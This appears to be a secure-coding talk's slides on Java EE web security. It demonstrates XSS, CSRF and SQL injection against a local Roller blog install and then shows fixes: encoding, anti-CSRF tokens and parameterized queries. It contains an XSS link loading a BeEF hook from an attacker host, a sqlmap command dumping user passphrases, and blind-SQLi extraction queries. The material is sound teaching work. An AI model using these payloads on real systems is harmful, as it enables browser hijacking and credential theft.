The document discusses securing Java EE web applications by addressing common vulnerabilities like XSS, CSRF, and SQL injection. It begins with an overview of these attacks and how they work. It then demonstrates exploiting vulnerabilities in an open source blog application by using XSS to run a browser exploitation framework, CSRF to change a privileged setting, and SQL injection to dump passwords from the database. Finally, it provides recommendations for secure coding practices like input validation, output encoding, using CSRF tokens, and parameterized queries to prevent these attacks.
2. About
• Frank Kim
– Consultant, ThinkSec
– Author, SANS Secure Coding in Java/JEE
– SANS Application Security Curriculum Lead
Java EE Web Security By Example 2
3. What You Should Know
• Hacking is not hard
• Don’t trust any data
– Assume that your
users are evil!
Java EE Web Security By Example 3
4. Outline
• Web App Attack Refresher
– XSS, CSRF, SQL Injection
• Testing
– Hacking an open source app
• Secure Coding
– Fixing security bugs
Java EE Web Security By Example 4
5. Cross-Site Scripting (XSS)
• Occurs when unvalidated data is
displayed back to the browser
• Types of XSS
– Stored
– Reflected
– Document Object Model (DOM) based
Java EE Web Security By Example 5
7. SQL Injection (SQLi)
• Occurs when dynamic SQL queries are used
– By injecting arbitrary SQL commands, attackers
can extend the meaning of the original query
– Can potentially execute any SQL statement on
the database
• Very powerful
– #1 on CWE/SANS Top 25 Most Dangerous
Software Errors
– #1 on OWASP Top 10
Java EE Web Security By Example 7
8. Outline
• Web App Attack Refresher
– XSS, CSRF, SQL Injection
• Testing
– Hacking an open source app
• Secure Coding
– Fixing security bugs
Java EE Web Security By Example 8
9. What are We Testing?
• Installation of Roller 3.0
• Fake install of SANS AppSec Street Fighter Blog
• Want to simulate the actions that a real attacker
might take
– There are definitely other avenues of attack
– We're walking through one attack scenario
Java EE Web Security By Example 9
10. Attack Scenario
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a
privilege escalation attack
- Use escalated privileges to access another feature
3) Use SQL Injection to access the
database directly
Java EE Web Security By Example 10
11. Spot the Vuln - XSS
Java EE Web Security By Example 11
13. Testing the "look" Param
• Admin pages include head.jsp
• The param is persistent for the session
Java EE Web Security By Example 13
14. XSS Exploitation
• Introducing BeEF
– Browser Exploitation Framework
– http://www.bindshell.net/tools/beef
• Uses XSS to hook the victim's browser
– Log user keystrokes, view browsing history,
execute JavaScript, etc
– Advanced attacks - Metasploit integration,
browser exploits, etc
Java EE Web Security By Example 14
15. XSS Exploitation Overview
1) Sends link with evil BeEF script
http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script
src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>
2) Victim clicks evil link
Attacker Victim
3) Victim's browser sends data
to attacker
Java EE Web Security By Example 15
22. SQL Injection Testing
• UserServlet is vulnerable to SQLi
http://localhost:8080/roller/roller-ui/authoring/user
No results
Java EE Web Security By Example 22
23. Exploiting SQL Injection
• Introducing sqlmap
– http://sqlmap.sourceforge.net
• Tool that automates detection and exploitation
of SQL Injection vulns
– Supports MySQL, Oracle, PostgreSQL, MS SQL Server
– Supports blind, inband, and batch queries
– Fingerprint/enumeration - dump db schemas, tables/
column names, data, db users, etc
– Takeover features - read/upload files, exec arbitrary
commands, exec Metasploit shellcode, etc
Java EE Web Security By Example 23
24. sqlmap Syntax
Ÿ Dump userids and passwords
python sqlmap.py
-u "http://localhost:8080/roller/roller-ui/
authoring/user?startsWith=f%25"
--cookie "username=test; JSESSIONID==<INSERT HERE>"
--drop-set-cookie -p startsWith
--dump -T rolleruser -C username,passphrase -v 2
Java EE Web Security By Example 24
26. How it Works
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy
f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy
Java EE Web Security By Example 26
27. Step By Step [0]
SELECT IFNULL(CAST(passphrase AS CHAR(10000)),
CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
returns ilovethetajmahal
Java EE Web Security By Example 27
28. Step By Step [1]
select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1);
returns i
select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 2, 1);
returns l
select MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 3, 1);
returns o
Java EE Web Security By Example 28
29. Step By Step [2]
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 1, 1));
returns 105
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 2, 1));
returns 108
select ORD(MID((SELECT IFNULL(CAST(passphrase AS
CHAR(10000)), CHAR(32)) FROM roller.rolleruser
LIMIT 2, 1), 3, 1));
returns 111
Java EE Web Security By Example 29
30. Attack Summary
1) XSS to control the victim's browser
2) Combine XSS and CSRF to conduct a
privilege escalation attack
- Use escalated privileges to access another feature
3) Use SQL Injection to access the
database directly
Java EE Web Security By Example 30
31. Outline
• Web App Attack Refresher
– XSS, CSRF, SQL Injection
• Testing
– Hacking an open source app
• Secure Coding
– Fixing security bugs
Java EE Web Security By Example 31
32. Data Validation
Inbound Data
Should I be consuming this?
Validation
Encoding
Outbound Data
Validation
Application Data Store
Inbound Data
Encoding Validation
Should I be emitting this?
Outbound Data
Java EE Web Security By Example 32
33. Output Encoding
• Encoding
– Convert characters so they are treated as data
and not special characters
• Must escape differently depending
where data is displayed on the page
• XSS Prevention Cheat Sheet
http://www.owasp.org/index.php/
XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sh
eet
Java EE Web Security By Example 33
34. Fix XSS in
head.jsp
• Add URL encoding
<link rel="stylesheet" type="text/css"
media="all" href="<%= request.getContextPath()
%>/roller-ui/theme/<%=
ESAPI.encoder().encodeForURL(theme) %>/
colors.css" />
Java EE Web Security By Example 34
35. Fix CSRF in
Update User Functionality
• UserAdmin.jsp
– Add anti-CSRF token
<input type="hidden" name=<%=
CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%=
CSRFTokenUtil.getToken(request.getSession(false)) %> >
• UserAdminAction.java
– Check anti-CSRF token
if (!CSRFTokenUtil.isValid(req.getSession(false), req)){
return mapping.findForward("error");
}
Java EE Web Security By Example 35
36. Fix SQL Injection in
UserServlet.java
• Use parameterized queries correctly
if (startsWith == null || startsWith.equals("")) {
query = "SELECT username, emailaddress FROM rolleruser";
stmt = con.prepareStatement(query);
} else {
query = "SELECT username, emailaddress FROM rolleruser
WHERE username like ? or emailaddress like ?";
stmt = con.prepareStatement(query);
stmt.setString(1, startsWith + "%");
stmt.setString(2, startsWith + "%");
}
rs = stmt.executeQuery();
Java EE Web Security By Example 36
38. Remember
• Hacking is not hard
• Don’t trust any data
– Validate input
– Encode output
– Use CSRF tokens
– Use parameterized queries
Java EE Web Security By Example 38